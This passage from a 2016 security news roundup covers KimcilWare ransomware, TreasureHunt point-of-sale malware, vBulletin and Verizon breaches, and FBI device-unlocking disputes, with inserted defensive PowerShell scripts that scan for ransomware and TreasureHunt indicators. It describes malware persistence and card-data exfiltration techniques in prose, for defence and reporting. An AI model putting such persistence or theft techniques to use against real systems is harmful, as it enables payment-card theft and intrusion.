A second case was reported a few days later on Magento's official forum by a store owner running version 1.9.2.4. That administrator suspected a security issue in the Helios Vimeo Video Gallery extension as the entry point.
Another ransomware with similar capabilities was discovered by the security researcher Jack (@Malwareforme). This second malware, called MireWare, uses the same tuyuljahat@hotmail.com email address in the ransom note placed in the index page. Jack's analysis shows that MireWare is a variant of the Hidden Tear open-source ransomware published by the Turkish security researcher Utku Sen for educational purposes.
Hidden Tear was intentionally designed with weaknesses, and Bleeping Computer's Lawrence Abrams, who analyzed MireWare, confirmed that this threat is currently broken as well, because its C&C server lacks a valid SSL certificate.
Experts believe that the KimcilWare ransomware is in its early stages, but that it might rapidly evolve.
If you administer a Magento store, update to the latest Magento version, keep third-party extensions patched, use strong passwords for admin accounts, and keep offline backups of the store files and database so that an encrypted site can be restored.
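For an administrator who suspects an infection, the indicators above (the `.kimcilware` extension and the ransom `index.html`) are enough for a quick, read-only triage pass. The following is an added example, not code from the article or from BleepingComputer; it runs under PowerShell (`pwsh`) on the web host or against a mounted copy, and the document root path is an assumption.

```powershell
# Added example, not from the original article or BleepingComputer: a triage pass
# over a Magento document root for the indicators described above. Runs with
# PowerShell (pwsh) on the host or against a mounted copy; the web root path is an
# assumption. It only reads, so it is safe to run before a forensic copy is taken.
function Find-KimcilWareIndicators {
    param([Parameter(Mandatory)][string]$WebRoot)

    $encrypted = @(Get-ChildItem -Path $WebRoot -Recurse -File -Filter '*.kimcilware' -ErrorAction SilentlyContinue)

    # Ransom notes: index.html files carrying the message text quoted above.
    $notes = @(Get-ChildItem -Path $WebRoot -Recurse -File -Filter 'index.html' -ErrorAction SilentlyContinue |
        Where-Object {
            (Get-Content -LiteralPath $_.FullName -Raw -ErrorAction SilentlyContinue) -match 'Webserver Encrypted|tuyuljahat@hotmail\.com'
        })

    $byTime = @($encrypted | Sort-Object LastWriteTime)
    [pscustomobject]@{
        EncryptedFiles = $encrypted.Count
        RansomNotes    = $notes.Count
        NotePaths      = @($notes | ForEach-Object { $_.FullName })
        # The first and last write times bracket the encryption run; correlate that
        # window with the web server access log to find the request that started it.
        FirstEncrypted = $(if ($byTime.Count) { $byTime[0].LastWriteTime } else { $null })
        LastEncrypted  = $(if ($byTime.Count) { $byTime[-1].LastWriteTime } else { $null })
        # Directories touched: on a shared server this separates the one infected
        # Magento instance from its neighbours, as in the StackExchange report above.
        Directories    = @($encrypted | ForEach-Object { $_.DirectoryName } | Sort-Object -Unique)
    }
}

Find-KimcilWareIndicators -WebRoot '/var/www/magento' | Format-List
```

The time window is the useful output: since the infection vector is unknown, the access-log entries just before `FirstEncrypted` (uploads to extension or media directories, admin logins from unexpected addresses) are the best lead on how the script got in, and that is what should be fixed before restoring from backup.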
Google has also been Ordered to Unlock 9 Android Phones
30.3.2016 Apple
The legal battle between Apple and the FBI (Federal Bureau of Investigation) over a locked iPhone that belonged to one of the San Bernardino shooters may be over, but the Department of Justice (DoJ) is back in front of judges with similar requests.
The American Civil Liberties Union (ACLU) has discovered publicly available court documents that revealed the government has asked Google’s assistance to help the Feds hack into at least nine locked Android smartphones citing the All Writs Act.
Yes, Apple is not the only company facing government requests over privacy and security — Google is also in the list.
The Google court documents released by the ACLU show that many federal agencies have been using the All Writs Act, the same 1789 law the DoJ invoked in the San Bernardino case to compel Apple to help the FBI in the terrorist investigation.
Additionally, the ACLU also released 54 court cases in which the federal authorities asked Apple for assistance to help them access information from a locked iPhone. However, this is the first time it has confirmed that Google has also received such requests.
All the cases appear to be closed, and the company is believed to have complied with the court orders. In most cases, Google was required to reset the passwords or bypass the lock screens of Samsung, HTC, Kyocera and Alcatel phones, among a number of other unidentified Android devices.
Unlike Apple, Google Can Reset Android Devices Remotely
In 2015, the New York District Attorney revealed that Google can remotely reset the lock password of an Android device when a court demands access to it.
In other words, unlike Apple, Google has the technical ability to reset the passcode on devices running versions older than Android 5.0 Lollipop, which do not have full-disk encryption enabled; at the time that covered roughly 74% of Android users.
Google had been ordered for technical assistance by many federal agencies over several cases including:
The Department of Homeland Security (DHS) in an investigation of an alleged child pornographer in California.
The FBI, in the investigation of an alleged cocaine dealer who goes by the name “Grumpy,” in New Mexico.
The Bureau of Land Management, in the investigation of an alleged marijuana grow operation in Oregon.
The Secret Service in an unknown court case in North Carolina.
However, Google said none of the cases required the company to write new software that weakens its products' security for the federal government.
"We carefully scrutinize subpoenas and court orders to make sure they meet both the letter and spirit of the law," a Google spokesman said in a statement. "However, we have never received an All Writs Act order like the one Apple recently fought that demands we build new tools that actively compromise our products’ security….We would strongly object to such an order."
No doubt the 1789 All Writs Act is being misused as a tool against encryption; it was never intended to let the government dictate software design.
TreasureHunt PoS Malware targets small retailers and banks
30.3.2016 Virus
Security experts at FireEye have spotted a criminal organization using a custom PoS malware family, dubbed TreasureHunt (or TreasureHunter), to steal payment card data from small retailers and sell it on underground forums.
The researchers found evidence that the threat has been around since at least late 2014. TreasureHunt was first noted by researchers at the SANS Institute, who observed the malware generating mutex names to evade detection.
US retailers and merchants are adopting payment solutions based on the EMV standard, which relies on chip-equipped cards and is considered more secure.
A number of factors are hampering the adoption of EMV among small organizations; the most important is probably the cost of the migration, estimated at 8.6 billion dollars.
A single EMV-compatible POS terminal can cost hundreds of dollars, so major retailers like Target face tens of millions of dollars in hardware alone, on top of the cost of deploying the technology and testing it in the live environment.
On the other side, banks will have to spend tens of millions to upgrade their internal systems to handle EMV payment card transactions.
Unfortunately, many cybercriminal groups have started focusing on organizations that are slow to make the transition, such as smaller banks and retailers, and TreasureHunt is one of the tools used against them.
TreasureHunt enumerates the processes running on the infected system and implements memory scraping to extract credit and debit card data. The stolen card data is sent to C&C servers via HTTP POST requests.
“In this article we examine TREASUREHUNT, POS malware that appears to have been custom-built for the operations of a particular “dump shop,” which sells stolen credit card data. TREASUREHUNT enumerates running processes, extracts payment card information from memory, and then transmits this information to a command and control server.” FireEye researcher Nart Villeneuve explained in a blog post.
FireEye believes the criminals compromised the PoS systems using stolen or weak credentials. Once on a system, TreasureHunt installs itself in the “%APPDATA%” directory and maintains persistence by creating the registry entry:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jucheck
“The malware scans all running processes and ignores processes that contain System33, SysWOW64, or \Windows\explorer.exe in their module names. It searches for payment card data and, if found, sends the data encoded back to the CnC server,” FireEye researcher Nart Villeneuve explained in a blog post.
All TreasureHunt samples carry the same compilation timestamp, October 19, 2014, but the experts were able to build a timeline of the PoS malware's activity from VirusTotal submissions and C&C domain registration details.
“While the compile timestamp remains the same as the previous version, the samples were first observed on Nov. 25, 2015, and March 3, 2016. The only significant change in this version is that the malware stores encoded configuration data in the NTFS alternate data streams (ADS) of the file %USERPROFILE%\ntuser.ini. We refer to these samples as version 0.1.1 due to the presence of the following string:
TreasureHunter version 0.1.1 Alpha, created by Jolly Roger
(jollyroger@prv.name) for BearsInc. Greets to Xylitol and co.”
“Jolly Roger” appears to be the malware's author, likely linked to a group called “BearsInc” that sells stolen payment card data on underground markets.
With more and more major firms moving to EMV, security researchers expect criminal organizations to increasingly target the smaller retailers and banks that have yet to adopt the more secure technology.
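The two host artifacts FireEye describes, the `jucheck` Run value and the alternate data stream on `ntuser.ini`, are cheap to check for on a PoS terminal. The following PowerShell is an added example, not FireEye's code; one caveat it builds in is that `jucheck.exe` is also the name of Oracle's legitimate Java update checker, installed under Program Files, so the deciding factor is a Run value that launches something out of `%APPDATA%`.

```powershell
# Added example, not FireEye's code: a host check for the two persistence
# indicators quoted above. jucheck.exe is also the name of Oracle's legitimate
# Java update checker under Program Files; the malware borrows the name, so a Run
# value pointing into %APPDATA% is what makes the finding high-severity.
function Find-TreasureHuntIndicators {
    $findings = @()

    foreach ($hive in 'HKLM:', 'HKCU:') {
        $run = "$hive\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
        $props = Get-ItemProperty -Path $run -ErrorAction SilentlyContinue
        if ($props -and $props.PSObject.Properties['jucheck']) {
            $cmd = [string]$props.jucheck
            $findings += [pscustomobject]@{
                Indicator = 'Run value "jucheck"'
                Detail    = "$run\jucheck = $cmd"
                # A legitimate updater is not launched from a roaming profile directory.
                Severity  = $(if ($cmd -match '\\AppData\\Roaming\\') { 'High' } else { 'Review' })
            }
        }
    }

    # Version 0.1.1 keeps its encoded configuration in an alternate data stream of
    # %USERPROFILE%\ntuser.ini. The file normally has only its default :$DATA stream.
    foreach ($profile in Get-ChildItem -Path "$env:SystemDrive\Users" -Directory -ErrorAction SilentlyContinue) {
        $ini = Join-Path $profile.FullName 'ntuser.ini'
        if (-not (Test-Path -LiteralPath $ini)) { continue }
        $streams = Get-Item -LiteralPath $ini -Stream * -ErrorAction SilentlyContinue |
            Where-Object { $_.Stream -ne ':$DATA' }
        foreach ($s in $streams) {
            $findings += [pscustomobject]@{
                Indicator = 'Alternate data stream on ntuser.ini'
                Detail    = "${ini}:$($s.Stream) ($($s.Length) bytes)"
                Severity  = 'High'
            }
        }
    }
    $findings
}

Find-TreasureHuntIndicators | Format-Table -AutoSize
```

Run it elevated so that every profile under `Users` is readable; `-Stream` needs NTFS and Windows PowerShell 3 or later. Because the samples all share one compile timestamp, file dates on the dropped executable are unreliable for dating the intrusion; the Run key's last-write time and the first outbound POST in the proxy logs are better anchors.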
Following revelations on Paris attacks, US lawmakers target burner phones
30.3.2016 Mobile
The Paris terrorists used burner phones, and a US lawmaker has proposed a bill that would force retailers to record the identity of the buyers of these devices.
Law enforcement and intelligence agencies worldwide are fighting terrorist organizations operating in their territories, but investigations are hampered by the use of encrypted communications. After the Paris attacks there was much speculation about the communication channels the terrorists might have used, including the PS4 messaging system.
New revelations appear to rule out that hypothesis: the terrorists behind the Paris attacks relied on burner phones, not encryption, to avoid being tracked.
“But the three teams in Paris were comparatively disciplined. They used only new phones that they would then discard, including several activated minutes before the attacks, or phones seized from their victims.” reported The New York Times.
The NYT cites a 55-page report compiled by the French antiterrorism police for France's Interior Ministry, which explains how the terrorists used phones activated less than an hour before the attacks.
“Everywhere they went, the attackers left behind their throwaway phones,” states the post. “New phones linked to the assailants at the stadium and the restaurant also showed calls to Belgium in the hours and minutes before the attacks, suggesting a rear base manned by a web of still unidentified accomplices.” “Security camera footage showed Bilal Hadfi, the youngest of the assailants, as he paced outside the stadium, talking on a cellphone. The phone was activated less than an hour before he detonated his vest.”
Outside the Bataclan concert venue, investigators found a Samsung smartphone in a dustbin with a Belgian SIM card used exclusively for the operation.
“It had a Belgian SIM card that had been in use only since the day before the attack. The phone had called just one other number—belonging to an unidentified user in Belgium.”
Police also found several unused burner phones, “still in their wrappers”, in a location used by the group.
Burner phones are an effective, low-cost way for criminals and terrorists to communicate: prepaid phones are cheap, and using a different device and number each time makes it hard for intelligence agencies to monitor them.
That may change soon, at least in the US, where a congresswoman from California has introduced a federal bill that would force retailers to verify and record the identity of buyers of prepaid burner phones or similar mobile devices, as well as SIM cards.
The proposal, introduced by Rep. Jackie Speier of California, is HR 4886, the “Closing the Pre-Paid Mobile Device Security Gap Act of 2016”; it would require retailers to identify the purchasers of burner phones and SIM cards.
“A BILL To require purchasers of pre-paid mobile devices or SIM cards to provide identification, and for other purposes,” reads the text, which would require an authorized reseller to obtain the following information from the purchaser:
The full name of the purchaser.
The complete home address of the purchaser.
The date of birth of the purchaser.
An authorized reseller making a sale to a buyer not in person shall verify the purchaser information provided under section 2 by requiring the purchaser to submit the following information:
Valid credit or debit card account information.
Social Security number.
Driver’s license number.
Any other personal identifying information that the Attorney General finds, by regulation, to be necessary for purposes of this section.
The congresswoman explained that the bill will not eliminate burner phones, but that it is a necessary measure to prevent terror plots and many other illegal activities.
“This bill would close one of the most significant gaps in our ability to track and prevent acts of terror, drug trafficking, and modern-day slavery,” Speier said in a Wednesday blog post. “The ‘burner phone’ loophole is [a glaring gap] in our legal framework that allows actors like 9/11 hijackers and the Times Square bomber to evade law enforcement while they plot to take innocent lives. The Paris attackers also used ‘burner phones.’ As we’ve seen so vividly over the past few days, we cannot afford to take these kinds of risks. It’s time to close this ‘burner phone’ loophole for good.”
There are aspects the bill does not address properly; for example, what happens if a criminal uses a stolen identity?
And SEC. 3, IDENTIFICATION VERIFICATION, under “Other Sales”, explicitly allows sales to purchasers who are not present in person, which opens the door to fraudulent purchases.
Now we wait for Congress to weigh in on the proposal.
vBulletin resets passwords after a targeted attack
30.3.2016 Incident
vBulletin suffered a serious attack last week in which one of its German servers was breached; in response it informed users that all passwords had been reset. According to vBulletin developer Paul Marsden, the server was accessed by an unauthorized party.
“Due to the discovery yesterday of unauthorized access to one of the VBG servers it is possible the hacker may have gained access to other vb systems as well. Therefore we have again taken the precaution of resetting all user password hashes. To be able to login to the site you will need to use the lost password functionality.
http://www.vbulletin.org/forum/login.php?do=lostpw
We apologise for any inconvenience this may cause.” said Marsden.
The attackers breached the German (VBG – “vbulletin-germany.com”) server, which could have allowed them to reach other systems of the organization, including “vBulletin.com” and “vBulletin.org.”
At the time of writing there are no further details on the breach. Marsden stressed that the attackers did not use a vBulletin exploit, which is consistent with the breached server not running the software at all, and he believes the attack was carefully planned:
“I can tell you it wasn't via any vB exploit – in fact, the VBG site doesn't run vbulletin. Someone clearly targeted the site, it was obvious they had planned this quite carefully,” said Marsden.
This isn't the first time the platform has been targeted: in November 2015 the official forum was taken down after a hacker using the online moniker “Coldzer0” defaced it.
The website has been defaced and the forum was displaying the message “Hacked by Coldzer0.”
According to DataBreaches.net, the vBulletin and Foxit Software forums were hacked by Coldzer0, who stole hundreds of thousands of user records.
The hacker published screenshots showing that he managed to upload a shell to the forum website and access user data, including user IDs, names, email addresses, security questions and answers, and password salts.
As usual, I strongly suggest that users change their passwords on any other website where they used the same login credentials.
How to Disable Windows 10 Upgrade (Forever) With Just One Click
30.3.2016 OS
If you are a Windows 7 or Windows 8.1 user who does not want to upgrade to Windows 10 now or any time soon, you are probably sick of Microsoft constantly pestering you to upgrade your OS.
Aren't you?
With its goal of deploying Windows 10 on over 1 billion devices worldwide, Microsoft is becoming more aggressive in pushing Windows 7 and 8.1 users to its newest operating system, and it is getting harder for users to prevent the OS from being installed.
But if you are worried that this out-of-control upgrade process will end up installing an unwanted OS, there is an easier way to block the Windows 10 upgrade on your PCs.
A new free tool, dubbed Never10, gives the user a one-click way to disable the Windows 10 upgrade until the user explicitly chooses to install Windows 10.
Never10 has been developed by Steve Gibson, the well-known software developer and founder of Gibson Research, which is why the tool is also known as "Gibson's Never10."
How to Disable Windows 10 Upgrade on Your PCs
Go to Gibson's Never10 official site and click Download.
Once downloaded, run the program. It detects whether the upgrade to Windows 10 is enabled or disabled on your system and shows a pop-up. If enabled, click the 'Disable Win10 Upgrade' button.
You'll see another pop-up showing that the Windows 10 upgrade is now disabled, with two buttons, 'Enable Win10 Upgrade' and 'Exit.' Click Exit.
That's it, and you have successfully disabled Windows 10 Upgrade on your PC.
Here's the kicker:
The best part of this tool is that you don't have to install anything on your PC. Never10 is a single executable: you run it, it installs nothing, and you can delete it when you're done.
"The elegance of this 'Never 10' utility is that it does not install ANY software of its own. It simply and quickly performs the required system editing for its user," Gibson writes on his page about the new utility.
According to Gibson, Never10 will be a great help to inexperienced users while advanced users will likely appreciate the fact that no additional software is installed and will be able to refer their family and friends to this easy-to-use utility.
For more technical details on how this tool works, you can head on to this link.
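The upgrade offer and the "Get Windows 10" (GWX) notifier are controlled by two Windows Update policy values that Microsoft documents in KB 3080351. Whether Never10 writes exactly these values is not stated in the article, so the following PowerShell is an added example, not Gibson's code: it reads and sets the documented policy values directly, mirroring the tool's Disable and Enable buttons, and is meant for administrators who want the same effect without running a third-party binary.

```powershell
# Added example, not Gibson's Never10: read and set the two documented policy
# values (Microsoft KB 3080351) that suppress the Windows 10 upgrade offer and
# the GWX notifier on Windows 7 / 8.1. Whether Never10 sets exactly these is an
# assumption; the functions mirror its Disable / Enable buttons. Run elevated.
$UpdatePolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate'
$GwxPolicy    = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Gwx'

function Get-Win10UpgradeState {
    # Missing value and value 0 both mean "upgrade allowed".
    $u = (Get-ItemProperty -Path $UpdatePolicy -Name DisableOSUpgrade -ErrorAction SilentlyContinue).DisableOSUpgrade
    $g = (Get-ItemProperty -Path $GwxPolicy    -Name DisableGwx       -ErrorAction SilentlyContinue).DisableGwx
    [pscustomobject]@{
        UpgradeOfferBlocked = ($u -eq 1)   # Windows Update will not offer / stage the upgrade
        GwxNotifierBlocked  = ($g -eq 1)   # no tray icon or "Get Windows 10" prompts
    }
}

function Disable-Win10Upgrade {
    foreach ($key in $UpdatePolicy, $GwxPolicy) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $UpdatePolicy -Name DisableOSUpgrade -Value 1 -Type DWord
    Set-ItemProperty -Path $GwxPolicy    -Name DisableGwx       -Value 1 -Type DWord
    Get-Win10UpgradeState
}

function Enable-Win10Upgrade {
    # Removing the values restores the default; leaving them at 0 is equivalent.
    Remove-ItemProperty -Path $UpdatePolicy -Name DisableOSUpgrade -ErrorAction SilentlyContinue
    Remove-ItemProperty -Path $GwxPolicy    -Name DisableGwx       -ErrorAction SilentlyContinue
    Get-Win10UpgradeState
}

Get-Win10UpgradeState
```

Because these live under the `Policies` hive, nothing in the normal Windows Update flow should reset them, but any tool that rewrites local policy (including a domain GPO that defines the same settings) can; re-run `Get-Win10UpgradeState` after Patch Tuesday if you rely on them.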
Unlike other Windows 10 blocker tools, Never10 blocks the upgrade but also lets you re-enable the update process if you change your mind, according to Windows watcher Paul Thurrott.
However, the primary purpose of Gibson's Never10 is to prevent Windows 7 and Windows 8.1 operating system from being upgraded to Windows 10. As Gibson says:
"Many users of Windows 7 and 8.1 are happy with their current version of Windows and have no wish to upgrade to Windows 10."
"There are many reasons for this, but among them is the fact that Windows 10 has become quite controversial due to Microsoft's evolution of their Windows OS platform into a service which, among other things, aggressively monitors and reports on its users' activities."
Moreover, just a month ago, Microsoft was caught displaying unsolicited advertisements on its Windows 10 users' desktops.
These reasons are enough for many users to stay on their previous versions of the Windows operating system.
How did you get into the killer's iPhone? Apple will take a hard look at the FBI in court
30.3.2016 Protection
For the past several months the US Federal Bureau of Investigation (FBI) tried to use the courts to force Apple to give it access to the data on the iPhone of the San Bernardino shooter. Now the tables have turned, and it is the American computer giant that is demanding cooperation from the FBI. The company's management wants to find out how investigators got into the iPhone, and it reportedly intends to go to court over it.
The Apple smartphone had been set to erase itself automatically after ten incorrect passcode entries. Questions therefore immediately multiplied as to how investigators managed to get into the locked device.
That is a headache above all for Apple's security experts. Everything suggests that iOS contains some critical security flaw that even the developers of the American computer giant do not yet know about. It would allow not only the FBI but also cybercriminals to break into Apple devices.
If that is true, tens of millions of iPhones and iPads would be at risk, not just those belonging to people suspected of crimes, but those of ordinary users as well.
Next come the lawyers
According to the Los Angeles Times, Apple's lawyers are already working out a legal strategy to force the government to disclose every specific of how the FBI managed to break into the shooter's iPhone. They are prepared to go to court to obtain the details.
Apple's management has not officially confirmed its position or its intention to obtain the details through the courts. It is quite likely, however, that for tactical reasons the company does not yet want to show its hand in the legal dispute it is preparing.
Justin Olsson, a security consultant at AVG, pointed out that customers' trust in Apple's products is at stake. “One way or another, Apple needs to find out the details. Without details of the possible vulnerability, the developers will not be able to secure the privacy of their devices,” Olsson told the Los Angeles Times.
The dispute has dragged on for months
The whole dispute between the FBI and Apple flared up because FBI investigators failed for two months to get into the locked iPhone of the Islamist radical. Because of that failure, a court ordered Apple to disable the auto-erase function. Apple's management refused, saying it was not technically possible.
The only option would be to create a “back door” into iOS, the operating system used by iPhones and iPads. Apple CEO Tim Cook repeatedly refused because of fears of abuse: once such a tool was implemented in the platform, the FBI would be able to bypass the security of practically any iPhone or iPad in the future.
In the end the FBI got to the data anyway, but it is keeping the details secret.
The San Bernardino attack was the deadliest in the country since the terrorist attacks of September 2001. Radicalized Muslim Syed Farook and his wife Tashfeen Malik shot 14 people dead there in early December. They were later killed in a shootout with police.
Data on 1.5 million customers stolen from Verizon is up for sale
30.3.2016 Incidents
With all the care Verizon Enterprise Solutions devotes to its business customers, it apparently forgot to take sufficient care of its own networks.
KrebsOnSecurity reports that an offer has appeared on a closed forum to sell the Verizon Enterprise customer database for $100,000, or in pieces at $10,000 per 100,000 records.
The data comes from a breach of the information systems of the B2B unit of the US telecommunications giant Verizon, the unit that handles security for customer systems, sells security solutions, and every year publishes a very interesting yearbook on data breaches and system intrusions, the Verizon Data Breach Investigations Report (DBIR).
Verizon confirmed to Brian Krebs that the attackers exploited a security flaw that allowed them to obtain customer contact information through a portal intended for Verizon's business customers. According to the company, the attackers only reached basic customer information, not sensitive data that would be particularly dangerous.
The seller is even offering the database in a format for the MongoDB database system, so it is reasonable to suspect that Verizon is downplaying the flaw somewhat: it looks as if the attacker simply managed to take a dump straight from the database.
How exactly the attackers obtained the data is not known. Verizon says it has already fixed the flaw but has not provided details. The whole affair is all the more piquant given that it was Verizon that, in a recent study, showed how hackers got into water treatment systems and even influenced the amount of chemicals released into the water (see Hackers Modify Water Treatment Parameters by Accident), and that in a number of other studies and analyses presents very concrete information about breaches and intrusions.
Microsoft built a special version of Windows 10 just for Chinese Government
30.3.2016 OS
China is very strict about censorship, which makes it difficult for companies to launch their products in the country. But companies like Microsoft are playing smartly to target the largest market in the world.
Microsoft has found a way to enter into the banned Chinese Market, but this time with official support for Chinese Government through a new custom and exclusive Windows 10 version for China.
It seems Microsoft has none of the qualms of Apple, which firmly refused the court order to create a special 'GovtOS' version to help the Feds unlock an iPhone.
Microsoft’s CEO for the Greater China region Ralph Haupter has confirmed that the company has built a Chinese government-approved version of Windows 10 OS that includes “more management and security controls” and less bloatware (pre-installed apps).
Specialized Windows 10 'Zhuangongban' for China
In a joint venture with a state-run technology and defense company, CETC (China Electronic Technology Group), Microsoft developed its specialized version of Windows 10 to comply with governmental standards.
The exclusive version of Windows 10 for China is codenamed "Windows 10 Zhuangongban," which means "Specialized Class."
The customized version of Windows 10 would come with basic apps and additional integrated privacy standards, which could be a trust-gaining strategy by Microsoft among Chinese nationals.
The Chinese government's initial stern action of banning Windows from Chinese desks was the outcome of Microsoft officially discontinuing support for Windows XP. Moreover, the company pushed its XP user base to switch to Windows 8.
According to a survey by Net Applications, a US-based analytics firm, 51% of Chinese users rely on Windows 7, whereas 32.9% of users are still relying on Windows XP, a discontinued product.
The Chinese government made various efforts to build a counterpart to Windows XP called Neo-Kylin. But as the new player is in its infancy, it failed to grab market attention because it lacked technical support.
With no other options left, the Chinese government finally convinced Microsoft to team up with a local technology company (CETC) to build a new OS, and Windows 10 Zhuangongban is the result.
Microsoft's Target -- 1 Billion Windows 10
Microsoft’s goal to install its newest Windows 10 OS on one Billion devices worldwide is not possible without covering the largest market in the world.
Convincing Chinese Government to adopt its Windows 10, even if it is a customized version, is a great achievement for Microsoft, which would help the company reach its 1 Billion goal soon.
China, the most populous country in the world, is a golden-egg client for Microsoft to broaden the Windows 10 market base.
With the Windows 10 Zhuangongban OS, now let’s see: Which Nation would be the next target for Microsoft to play the same move in order to reach its goal? Will it be Germany or Russia??
FBI is fighting back against Judge's Order to reveal TOR Exploit Code
30.3.2016 Safety
Last month, the Federal Bureau of Investigation (FBI) was ordered to reveal the complete source code for the TOR exploit it used to hack visitors of the world’s largest dark web child pornography site, PlayPen.
Robert J. Bryan, the federal judge, ordered the FBI to hand over the TOR browser exploit code so that defence could better understand how the agency hacked over 1,000 computers and if the evidence gathered was covered under the scope of the warrant.
Now, the FBI is pushing back against the federal judge’s order.
On Monday, the Department of Justice (DOJ) and the FBI filed a sealed motion asking the judge to reconsider his ruling, saying that revealing the exploit used to bypass the Tor Browser protections is not necessary for the defense or for other cases.
In previous filings, the defence has argued that the offensive operation used in the case was "gross misconduct by government and law enforcement agencies," and that the Network Investigative Technique (NIT) conducted additional functions beyond the scope of the warrant.
The Network Investigative Technique or NIT is the FBI's terminology for a custom hacking tool designed to penetrate TOR users.
This particular case concerns Jay Michaud, one of the accused, from Vancouver, Washington, who was arrested last year after the FBI seized a dark web child sex abuse site and ran it from the agency's own servers for 13 days.
During this period, the FBI deployed an NIT against users who visited particular child pornography threads, grabbing their real IP addresses among other details. This led to the arrests of Michaud and others.
The malware expert Vlad Tsyrklevich, retained by the defense to analyse the NIT, said that he received only parts of the NIT to analyse, but not the sections that would confirm that the identifier attached to the suspect's NIT infection was unique.
"He is wrong," Special Agent Daniel Alfin writes. "Discovery of the 'exploit' would do nothing to help him determine if the government exceeded the scope of the warrant because it would explain how the NIT was deployed to Michaud's computer, not what it did once deployed."
In a separate case, the Tor Project has accused the FBI of paying Carnegie Mellon University (CMU) at least $1 Million to disclose a technique it had discovered that could help unmask Tor users and reveal their IP addresses. The FBI, though, denies the claims.
Bitdefender Vaccine now supports also CTB-Locker, Locky, TeslaCrypt
30.3.2016 Virus
Prevention is better than the cure: users can immunize their PCs against CTB-Locker, Locky and TeslaCrypt using the Bitdefender Anti-ransomware vaccine.
Security experts from the Romanian security vendor Bitdefender have updated their anti-ransomware vaccine in order to protect machines from the latest versions of the CTB-Locker, Locky and TeslaCrypt ransomware.
According to data recently published by Fortinet, the top ransomware families are CryptoWall, Locky, and TeslaCrypt; while CryptoWall is predominant, Locky is rapidly spreading.
The Bitdefender Anti-Ransomware toolkit was developed by the company years ago to help potential victims of crypto-ransomware prevent infections.
Some ransomware decryptors try to exploit encryption flaws in the ransomware implementation to decrypt files, or use encryption keys recovered by law enforcement during their operations.
These conditions are not easy to meet, so Bitdefender is promoting prevention instead of the cure by spreading its anti-ransomware vaccine.
The most recent version, 1.0.11.26, includes detection for the latest variants of ransomware in the wild, including CTB-Locker, Locky and TeslaCrypt.
These three ransomware families have evolved differently in recent weeks: Locky, for example, is rapidly spreading, while a new strain of TeslaCrypt, version 4.0, has appeared in the wild and implements significant improvements.
There is no news regarding CTB-Locker; in fact, there are no new infections in the wild.
"Bitdefender anti-malware researchers have released a new vaccine tool which can protect against known and possible future versions of the CTB-Locker, Locky and TeslaCrypt crypto ransomware families," states the announcement published by Bitdefender.
“The new tool is an outgrowth of the Cryptowall vaccine program, in a way.” Chief Security Strategist Catalin Cosoi explained. “We had been looking at ways to prevent this ransomware from encrypting files even on computers that were not protected by Bitdefender antivirus and we realized we could extend the idea.”
Download the Bitdefender Anti-ransomware vaccine from the company website.
Feds request Judge to review the order to reveal TOR Exploit Code
30.3.2016 Safety
FBI is fighting back against the federal judge’s order to reveal the Tor Exploit and with DoJ filed a sealed motion requesting the review of the ruling.
A few weeks ago, a judge has ordered the FBI to reveal the complete source code for the TOR exploit to defense lawyers in a child porn case.
In a case involving child pornography, a judge ordered the FBI to provide all the code used to hack the suspects' PCs and detailed information on the procedure followed to de-anonymize Tor users.
Colin Fieman, a federal public defender working on the case, was asked by motherboard.vice.com whether the code would include exploits to bypass security features; Fieman's reply was that the code would bypass "everything."
"The declaration from our code expert was quite specific and comprehensive, and the order encompasses everything he identified," he told Motherboard.
Fieman is defending Jay Michaud, a Vancouver public schools administration worker arrested by the FBI right after the FBI closed a popular child pornography site called "Playpen" hosted on the dark web, where a network investigative technique (NIT), the agency's term for a hacking tool, was used.
According to court documents reviewed by Motherboard, the FBI had used the NIT to identify the suspects while surfing on the Tor network.
The FBI monitored a bulletin board hidden service launched in August 2014, named Playpen, mainly used for “the advertisement and distribution of child pornography.”
The FBI was able to harvest around 1300 IPs, and so far 137 people have been charged. The network investigative technique used by the FBI reached computers in the UK, Chile and Greece.
The defence has argued that the investigation that leveraged on the NIT was “gross misconduct by government and law enforcement agencies,” and that the Tor Exploit conducted operations out of the warrant scope.
In January, a report published by the Washington Post confirmed that in the summer of 2013 Feds hacked the TorMail service by injecting the NIT code in the mail page in the attempt to track its users.
Last month the federal judge Robert J. Bryan ordered the FBI to hand over the TOR browser exploit code in order to allow the defence to understand how the law enforcement used it.
Now the FBI is fighting back against the federal judge's order and, together with the Department of Justice (DOJ), has filed a sealed motion requesting a review of the ruling.
The FBI and the DoJ maintain that it is not necessary to reveal the details of the Tor exploit.
The security expert and exploit developer Vlad Tsyrklevich, who analyzed the Tor exploit for the defense, explained that he received only a portion of the NIT code and said he had not reviewed the portion of code that links the NIT identifier to a specific suspect.
“He is wrong,” Special Agent Daniel Alfin writes. “Discovery of the ‘exploit’ would do nothing to help him determine if the government exceeded the scope of the warrant because it would explain how the NIT was deployed to Michaud’s computer, not what it did once deployed.”
The FBI may know of an iPhone flaw that even Apple is unaware of
29.3.2016 Protection
The American Federal Bureau of Investigation (FBI) boasted overnight into Tuesday that it had managed to bypass the security of the San Bernardino killer's iPhone. That is very bad news for Apple. Everything suggests that the investigators know of some critical security flaw in the iOS operating system that probably not even the developers of the American computer giant know about.
Already last Tuesday the investigators reported that they were probably able to decrypt Syed Farook's iPhone. [full story]
Exactly one week later, FBI representatives announced that they had actually managed to reach the data. How they did it, however, is still being kept secret, and nothing suggests they will disclose their method to the wider public any time soon.
Such flaws can provide full access to devices.
security consultant Ross Schulman
That is exactly what may pose a fairly big problem. As security consultant Ross Schulman told CNN, the FBI may have discovered a flaw in the iOS operating system used by iPhone smartphones and iPad tablets.
In the same way, the investigators would be able to get into other Apple devices too. "We know from the past that such flaws can provide full access to devices that many of us rely on every day," Schulman said.
The flaw may threaten other users too
In his view, Apple should therefore want, in its own interest, to find out how the FBI got into the killer's iPhone. Only then will its people be able to fix any flaw and protect all other users.
The investigators were probably helped in breaking the iPhone's security by the company Cellebrite, based in Israel. The firm confirmed to the British broadcaster BBC that it cooperates with the American investigators, but did not say more.
On its website, however, Cellebrite states that one of its tools can decrypt and extract data from the iPhone 5C. [full story]
Two months of unsuccessful effort
